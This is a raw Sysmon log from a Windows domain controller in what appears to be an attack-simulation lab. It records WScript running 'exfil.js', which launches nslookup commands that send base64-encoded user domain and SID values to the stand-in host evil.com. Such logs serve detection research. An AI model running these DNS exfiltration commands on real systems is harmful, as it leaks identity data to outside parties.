ntdll.dll+51791 10341000x8000000000000000215235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3646-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-18E0-629A-6742-000000005F02}39762600C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-3646-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.175{2E1864BB-18FE-629A-3646-000000005F02}3732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAw evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyhoeb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.168{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcit.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{00000000-0000-0000-0000-000000000000}388<unknown process>-udpfalsefalse127.0.0.1-51246-false127.0.0.1-53domain 354300x8000000000000000215230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{00000000-0000-0000-0000-000000000000}388<unknown process>-udptruefalse127.0.0.1-51246-false127.0.0.1-53domain 354300x8000000000000000215229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{00000000-0000-0000-0000-000000000000}388<unknown process>-udpfalsefalse127.0.0.1-51245-false127.0.0.1-53domain 354300x8000000000000000215228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{00000000-0000-0000-0000-000000000000}388<unknown process>-udptruefalse127.0.0.1-51245-false127.0.0.1-53domain 354300x8000000000000000215227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{00000000-0000-0000-0000-000000000000}388<unknown process>-udpfalsefalse127.0.0.1-51244-false127.0.0.1-53domain 354300x8000000000000000215226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.836{00000000-0000-0000-0000-000000000000}388<unknown process>-udptruefalse127.0.0.1-51244-false127.0.0.1-53domain 354300x8000000000000000215225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{00000000-0000-0000-0000-000000000000}6680<unknown process>-udpfalsefalse127.0.0.1-51243-false127.0.0.1-53domain 354300x8000000000000000215224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{00000000-0000-0000-0000-000000000000}6680<unknown process>-udptruefalse127.0.0.1-51243-false127.0.0.1-53domain 354300x8000000000000000215223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{00000000-0000-0000-0000-000000000000}6680<unknown process>-udpfalsefalse127.0.0.1-51242-false127.0.0.1-53domain 354300x8000000000000000215222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-51239-false127.0.0.1-53domain 354300x8000000000000000215221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-51238-false127.0.0.1-53domain 354300x8000000000000000215220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.694{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-51238-false127.0.0.1-53domain 354300x8000000000000000215219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.611{00000000-0000-0000-0000-000000000000}5896<unknown process>-udpfalsefalse127.0.0.1-51237-false127.0.0.1-53domain 354300x8000000000000000215218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.611{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-51237-false127.0.0.1-53domain 354300x8000000000000000215217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.610{00000000-0000-0000-0000-000000000000}5896<unknown process>-udpfalsefalse127.0.0.1-51236-false127.0.0.1-53domain 354300x8000000000000000215216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.610{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-51236-false127.0.0.1-53domain 354300x8000000000000000215215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.538{00000000-0000-0000-0000-000000000000}7864<unknown process>-udpfalsefalse127.0.0.1-51234-false127.0.0.1-53domain 354300x8000000000000000215214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.538{00000000-0000-0000-0000-000000000000}7864<unknown process>-udptruefalse127.0.0.1-51234-false127.0.0.1-53domain 354300x8000000000000000215213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.537{00000000-0000-0000-0000-000000000000}7864<unknown process>-udpfalsefalse127.0.0.1-51233-false127.0.0.1-53domain 354300x8000000000000000215212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.537{00000000-0000-0000-0000-000000000000}7864<unknown process>-udptruefalse127.0.0.1-51233-false127.0.0.1-53domain 354300x8000000000000000215211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.335{00000000-0000-0000-0000-000000000000}7688<unknown process>-udpfalsefalse127.0.0.1-51224-false127.0.0.1-53domain 354300x8000000000000000215210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.260{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-51221-false127.0.0.1-53domain 354300x8000000000000000215209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.196{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51219-false127.0.0.1-53domain 10341000x8000000000000000215208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-18FE-629A-3446-000000005F02}28727264C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3546-000000005F02}2560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3546-000000005F02}2560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.137{2E1864BB-18FE-629A-3346-000000005F02}48127296C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-3546-000000005F02}2560C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.141{2E1864BB-18FE-629A-3546-000000005F02}2560C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-3346-000000005F02}4812C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcit.tmp 2>&1 10341000x8000000000000000215200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.122{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3446-000000005F02}2872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.122{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3446-000000005F02}2872C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.106{2E1864BB-18FE-629A-3446-000000005F02}28727264C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3346-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.106{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3446-000000005F02}2872C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.103{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.103{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.103{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.103{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.102{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3346-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.102{2E1864BB-18E0-629A-6742-000000005F02}3976420C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-3346-000000005F02}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.102{2E1864BB-18FE-629A-3346-000000005F02}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcit.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.084{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhcedh.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.068{2E1864BB-18FE-629A-3146-000000005F02}77165740C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3246-000000005F02}3292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 